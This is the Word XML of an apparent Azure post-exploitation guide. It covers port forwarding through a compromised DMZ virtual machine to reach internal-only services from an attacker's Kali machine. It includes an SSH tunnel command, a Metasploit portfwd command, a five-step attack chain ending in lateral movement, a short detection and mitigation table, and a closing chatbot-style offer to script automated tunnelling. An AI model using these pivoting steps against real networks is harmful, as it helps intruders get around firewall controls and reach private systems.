    <w:p w14:paraId="1C270785" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now you're accessing an internal-only Azure service </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>from outside the network</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, bypassing NSGs and the Azure Firewall via port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2058344A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7FF8A841">
          <v:rect id="_x0000_i1180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DAAC7C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🌉</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alternative: Port Forwarding via SSH Tunnels (Manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17F454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If SSH access is available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140507EB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ssh -L 8081:localhost:8080 azureuser@10.1.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D8E33" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Now visit http://127.0.0.1:8081 on Kali and interact with the private internal service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43150D79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015BBB08">
          <v:rect id="_x0000_i1181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2B7B9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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection and Mitigation (Defensive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5070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="08AE5B7F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EE2BC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Azure Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8D3EC9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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="1F51B632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CCA3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Azure Firewall Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACF5738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Detect port forwarding and lateral traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="15F9E2D4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4E25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NSG Flow Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250D9AD7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Monitor unexpected internal communications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="7DD7E5B3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A5C0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Just-In-Time VM Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72067C35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Prevent persistent SSH access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="33E7FA43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0C52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Microsoft Defender for Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A98F36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Flag abnormal port usage, tunneling patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="68EB18AB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A8B1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Disable Agent Tunnels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60EC6BA9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Harden VMs against RunCommand post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E1E5601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3722C74C">
          <v:rect id="_x0000_i1182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD61DD6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📍</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Case: DMZ Web Server in Spoke VNET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D435A6F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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF116EF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A web app in the DMZ subnet (10.1.0.0/24) listens on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09BB06" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Public: Port 80 (via Load Balancer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5893BE" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Private: Port 8443 (Admin interface only reachable inside VNET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428D390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Once the attacker gets access to this web server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49189A" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>They forward port 8443 to attacker box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484184E4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portfwd add -l 8443 -p 8443 -r 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493FA78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Now they can access the internal admin panel directly via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC86B1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https://127.0.0.1:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7F782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4C447A96">
          <v:rect id="_x0000_i1183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F33CF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🔚</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US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5292"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="671A44A6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3502A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DC70511" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="001E6B7C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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="353873A8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8E96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1️</w:t>
            </w:r>
            <w:r w:rsidRPr="00907CF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:eastAsia="en-US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A12FB1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Compromise a VM in DMZ or Spoke VNET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="533693F3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D1F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2️</w:t>
            </w:r>
            <w:r w:rsidRPr="00907CF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:eastAsia="en-US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0B9CE92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Discover internal-only services via netstat, nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="1419B076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B41B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3️</w:t>
            </w:r>
            <w:r w:rsidRPr="00907CF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:eastAsia="en-US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AC8600E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Use Metasploit portfwd or SSH tunnels to forward ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="6FAE64F4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5B43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4️</w:t>
            </w:r>
            <w:r w:rsidRPr="00907CF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:eastAsia="en-US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820DC41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Access those services from the attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="6593CA35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DF74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5️</w:t>
            </w:r>
            <w:r w:rsidRPr="00907CF2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:eastAsia="en-US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2800D86" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="001E6B7C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Move laterally deeper into the Azure network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71C14F1C" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="7A1FB8D6">
          <v:rect id="_x0000_i1184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004C8AE" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optional Next Step: Automate This with autossh or socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72937713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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Would you like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bash or Python script</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C1921" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Detects open ports,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CB8F7" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Creates SSH tunnels, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E00BB7E" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Exposes them on your local Kali machine for multi-hop forwarding?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25897E" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Let me know if you'd like that added to your Azure Post-Exploitation Toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541893DE" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DED9778" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381A28FD" w14:textId="77777777" w:rsidR="00F41B33" w:rsidRPr="003718E3" w:rsidRDefault="00F41B33" w:rsidP="003718E3"/>
    <w:sectPr w:rsidR="00F41B33" w:rsidRPr="003718E3" w:rsidSect="00D701C1">
      <w:footerReference w:type="default" r:id="rId5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32183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ED8BF0C" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701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25EAC7" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1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793"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D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718"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F43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3454"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="725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7792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB8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82287"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3B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82DA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE1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5F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3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0323E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="478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6199"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FB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0236B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13A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2074E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF5A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944C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="133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6793A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E53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0608B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="155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B69A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="127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95FF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3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33FB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA8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C5551"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BABC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5034A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D47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31B9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B9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95025">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="251473921">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1827016638">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1533349296">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1326083359">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1470316471">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1018503189">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="733118406">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="972446564">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="932471603">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1008561522">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1268006310">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2100440650">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1553804646">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="131673652">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1092825241">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1592156036">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="482742228">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1799033003">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2090617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3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8E3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01C1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FB3D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1AE66BF1-C18E-42B1-8E3A-0398704D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1C1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E3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E3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E3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E3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E3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E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371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E3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37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E3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3718E3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701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1C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs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2026-04-06T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>